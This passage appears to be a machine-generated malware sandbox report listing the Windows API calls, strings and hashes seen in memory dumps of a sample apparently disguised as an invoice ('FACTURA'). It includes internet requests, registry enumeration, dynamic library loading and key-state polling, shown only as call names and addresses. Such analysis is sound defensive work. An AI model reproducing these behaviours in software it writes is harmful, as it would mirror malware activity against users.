                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Delete$InfoItem_memset
                                                                            • String ID: 0
                                                                            • API String ID: 1173514356-4108050209
                                                                            • Opcode ID: 9e28e54efe157b349328f77165de98239bd7900e43385ff30194f1b46aef0f02
                                                                            • Instruction ID: 72f3687fce4d28850b13304777ca8efb738aba80659260f9afc9b5a9dd9ea8d3
                                                                            • Opcode Fuzzy Hash: 9e28e54efe157b349328f77165de98239bd7900e43385ff30194f1b46aef0f02
                                                                            • Instruction Fuzzy Hash: A241BE716043019FDB60DF24CC84B2ABBE8EF85334F144A6EF9A697291D734E905DB62
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F4D7C5
                                                                              • Part of subcall function 00ED784B: _memmove.LIBCMT ref: 00ED7899
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharLower_memmove
                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                            • API String ID: 3425801089-567219261
                                                                            • Opcode ID: 224b793de346f69253cc079e29bda0e4806767b788497b139d9c6c64ce222878
                                                                            • Instruction ID: 56d4eea2240237b924548d625b09dae5d89c88bb96988c52d8eba8b24f6df116
                                                                            • Opcode Fuzzy Hash: 224b793de346f69253cc079e29bda0e4806767b788497b139d9c6c64ce222878
                                                                            • Instruction Fuzzy Hash: E6317A71904619ABCF00EF58C9519FEB7F5FF04320B10866AE866A77D2DB71A906DB80
                                                                            APIs
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                              • Part of subcall function 00F2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F2AABC
                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F28F14
                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F28F27
                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00F28F57
                                                                              • Part of subcall function 00ED7BCC: _memmove.LIBCMT ref: 00ED7C06
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$_memmove$ClassName
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 365058703-1403004172
                                                                            • Opcode ID: d53ba10572a408ba2444f384b1df483e320dd967a68faab7779084093817a669
                                                                            • Instruction ID: d796243cbbc9da050805adb63be32eed4bcacce56e829982e2b07b13afe4705b
                                                                            • Opcode Fuzzy Hash: d53ba10572a408ba2444f384b1df483e320dd967a68faab7779084093817a669
                                                                            • Instruction Fuzzy Hash: 44210472A01208BBDB14ABB0DC85DFFB7A9DF453A0F14411AF821A72E1DF39480AA610
                                                                            APIs
                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F4184C
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F41872
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F418A2
                                                                            • InternetCloseHandle.WININET(00000000), ref: 00F418E9
                                                                              • Part of subcall function 00F42483: GetLastError.KERNEL32(?,?,00F41817,00000000,00000000,00000001), ref: 00F42498
                                                                              • Part of subcall function 00F42483: SetEvent.KERNEL32(?,?,00F41817,00000000,00000000,00000001), ref: 00F424AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                            • String ID:
                                                                            • API String ID: 3113390036-3916222277
                                                                            • Opcode ID: 0d0b6184f590c467a6fab970dc13959d9a11a59dc65018885cfa9e20a44fe907
                                                                            • Instruction ID: 319dba2816ca62c81204a03c4d85100d9395d78c95f7c8422b51749a0b7134b9
                                                                            • Opcode Fuzzy Hash: 0d0b6184f590c467a6fab970dc13959d9a11a59dc65018885cfa9e20a44fe907
                                                                            • Instruction Fuzzy Hash: 1421BEB150030CBFEB119B60DC85EBF7BEDFB48755F10412AF905A2240EA248D48B7A0
                                                                            APIs
                                                                              • Part of subcall function 00ED1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00ED1D73
                                                                              • Part of subcall function 00ED1D35: GetStockObject.GDI32(00000011), ref: 00ED1D87
                                                                              • Part of subcall function 00ED1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00ED1D91
                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F56461
                                                                            • LoadLibraryW.KERNEL32(?), ref: 00F56468
                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F5647D
                                                                            • DestroyWindow.USER32(?), ref: 00F56485
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                            • String ID: SysAnimate32
                                                                            • API String ID: 4146253029-1011021900
                                                                            • Opcode ID: 6f3d30c29dc216e54bcb266ecaf8ae3dc65b8578b0d5ea221ded151e702247fa
                                                                            • Instruction ID: f04a738a926dcc0dbd4f2459d964ac4e1b2714c0ada79aad791e7c7f49198880
                                                                            • Opcode Fuzzy Hash: 6f3d30c29dc216e54bcb266ecaf8ae3dc65b8578b0d5ea221ded151e702247fa
                                                                            • Instruction Fuzzy Hash: 51217C71600209ABEF108F64DC80EBB77A9EB59375F904629FB20D3190D7759C45B760
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00F36DBC
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F36DEF
                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00F36E01
                                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00F36E3B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandle$FilePipe
                                                                            • String ID: nul
                                                                            • API String ID: 4209266947-2873401336
                                                                            • Opcode ID: 171b51be50142e84b62fcd19e37d134f662f28b368163192d2d48631fe954553
                                                                            • Instruction ID: 6099b1c527f6188aa82d5eda8b65ae3223dd2048bc546126943c94af4bd6be6a
                                                                            • Opcode Fuzzy Hash: 171b51be50142e84b62fcd19e37d134f662f28b368163192d2d48631fe954553
                                                                            • Instruction Fuzzy Hash: 13219275A00309BBDB209F29DC04A9A77F4EF45731F208629FDA0D72D0DB709955AB54
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00F36E89
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F36EBB
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00F36ECC
                                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00F36F06
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandle$FilePipe
                                                                            • String ID: nul
                                                                            • API String ID: 4209266947-2873401336
                                                                            • Opcode ID: 76a639aed1812cd86b607b2e0d67b078b09e99a6916e292d9e87fb1839929b8b
                                                                            • Instruction ID: ae743f726f30061657a76d2a1915fde461197930f87a106fedc957410c6207da
                                                                            • Opcode Fuzzy Hash: 76a639aed1812cd86b607b2e0d67b078b09e99a6916e292d9e87fb1839929b8b
                                                                            • Instruction Fuzzy Hash: 5C21B079900305EBDB209F69CC04A9A77E8AF45731F208A19F9A0D72D0DB70A898AB14
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00F3AC54
                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F3ACA8
                                                                            • __swprintf.LIBCMT ref: 00F3ACC1
                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,00F5F910), ref: 00F3ACFF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                            • String ID: %lu
                                                                            • API String ID: 3164766367-685833217
                                                                            • Opcode ID: adb887564353a3c90474ae5a084f2dfd3f511abdc38d81acd21c4e908c17b650
                                                                            • Instruction ID: 4622fb2dc3601fd8bdc012d27f64adbf7423b6e7495446df65f44f7897484f14
                                                                            • Opcode Fuzzy Hash: adb887564353a3c90474ae5a084f2dfd3f511abdc38d81acd21c4e908c17b650
                                                                            • Instruction Fuzzy Hash: 44217135A00209AFCB10DF65CD45DAE7BF8EF89715B0040A9F909EB352DB31EA45DB61
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 00F31B19
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                            • API String ID: 3964851224-769500911
                                                                            • Opcode ID: 9a56bd666d96fb416b05263f8bdd9f1a97e5688d4fd1f743e79acf111c42da2f
                                                                            • Instruction ID: e8ab55dcb50c58096b2ed3bbbb4ec8066ba4cca0e2695d7745ca6510a4995260
                                                                            • Opcode Fuzzy Hash: 9a56bd666d96fb416b05263f8bdd9f1a97e5688d4fd1f743e79acf111c42da2f
                                                                            • Instruction Fuzzy Hash: C3115B719102088FCF00EFA4D9618FEF7B4FF66324F5484A9D814AB692EB325D06EB50
                                                                            APIs
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F4EC07
                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F4EC37
                                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F4ED6A
                                                                            • CloseHandle.KERNEL32(?), ref: 00F4EDEB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                            • String ID:
                                                                            • API String ID: 2364364464-0
                                                                            • Opcode ID: 67ba89c1fa4bbce1360dfb1405204c70acb87c0a36d95ff7c88434c4d50fcc4d
                                                                            • Instruction ID: 1dfefc5fc44005a40b6c64e6571ddd7f4a4e52f16700bdd1ef5b9498e0937209
                                                                            • Opcode Fuzzy Hash: 67ba89c1fa4bbce1360dfb1405204c70acb87c0a36d95ff7c88434c4d50fcc4d
                                                                            • Instruction Fuzzy Hash: 1C814E71A003009FD764EF28CC46B6AB7E5EF44720F14881EF999EB3D2D671AC419B52
                                                                            APIs
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                              • Part of subcall function 00F50E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F4FDAD,?,?), ref: 00F50E31
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F500FD
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F5013C
                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F50183
                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 00F501AF
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00F501BC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                            • String ID:
                                                                            • API String ID: 3440857362-0
                                                                            • Opcode ID: 694c3cdd1714dde037ef842581867f0455e2a5ebf33b77a23e1536bc76dd244c
                                                                            • Instruction ID: 59d9246261c28bb6458ae59bb1b37822f1c34b7796d500fcc0ebd6d9575e4c53
                                                                            • Opcode Fuzzy Hash: 694c3cdd1714dde037ef842581867f0455e2a5ebf33b77a23e1536bc76dd244c
                                                                            • Instruction Fuzzy Hash: 96516971608304AFC704EF58CC81E6AB7E9FF84314F44492EFA95972A2DB31E909DB52
                                                                            APIs
                                                                              • Part of subcall function 00ED9837: __itow.LIBCMT ref: 00ED9862
                                                                              • Part of subcall function 00ED9837: __swprintf.LIBCMT ref: 00ED98AC
                                                                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F4D927
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00F4D9AA
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00F4D9C6
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00F4DA07
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F4DA21
                                                                              • Part of subcall function 00ED5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F37896,?,?,00000000), ref: 00ED5A2C
                                                                              • Part of subcall function 00ED5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F37896,?,?,00000000,?,?), ref: 00ED5A50
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 327935632-0
                                                                            • Opcode ID: 1807fbf647e3062a45f8f122ccad02b88eae7b87ddb9f65a7fc5b40691cf6e54
                                                                            • Instruction ID: a71999c8e22c174f5aaeda412b058a62fbfca48676eddfc4f1253bcb1b4e2208
                                                                            • Opcode Fuzzy Hash: 1807fbf647e3062a45f8f122ccad02b88eae7b87ddb9f65a7fc5b40691cf6e54
                                                                            • Instruction Fuzzy Hash: 0D512A35A00609DFCB00EFA8C8849ADBBF5FF09324B1580A6E955AB312D735ED46DF91
                                                                            APIs
                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F3E61F
                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00F3E648
                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F3E687
                                                                              • Part of subcall function 00ED9837: __itow.LIBCMT ref: 00ED9862
                                                                              • Part of subcall function 00ED9837: __swprintf.LIBCMT ref: 00ED98AC
                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F3E6AC
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F3E6B4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 1389676194-0
                                                                            • Opcode ID: b0941a72f4662aac191e2aeb319d29042241f0ba6cf40b4ff4684dc9ae635011
                                                                            • Instruction ID: a9bdb0fc4bf66998b8ec9853154b1e7fec8b68d2db019bdf5d1000c0b0bc27fc
                                                                            • Opcode Fuzzy Hash: b0941a72f4662aac191e2aeb319d29042241f0ba6cf40b4ff4684dc9ae635011
                                                                            • Instruction Fuzzy Hash: 8D510C79A00209DFCB05EF64C9819AEBBF5EF09314F1480A5E909AB362CB31ED55DF50
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f55db90634ecc4d9292b932cc2187916b799e630b371e5cc3ccd483869b35e43
                                                                            • Instruction ID: e165217159b34888aa19289bf05706b7a76da23c3a4e64a6b7914efaddbd71de
                                                                            • Opcode Fuzzy Hash: f55db90634ecc4d9292b932cc2187916b799e630b371e5cc3ccd483869b35e43
                                                                            • Instruction Fuzzy Hash: A141A335D04608AFD721DF28CC48FA9BBA4EB09322F150365FE15A72E1DB309D69FA51
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 00ED2357
                                                                            • ScreenToClient.USER32(00F957B0,?), ref: 00ED2374
                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00ED2399
                                                                            • GetAsyncKeyState.USER32(00000002), ref: 00ED23A7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
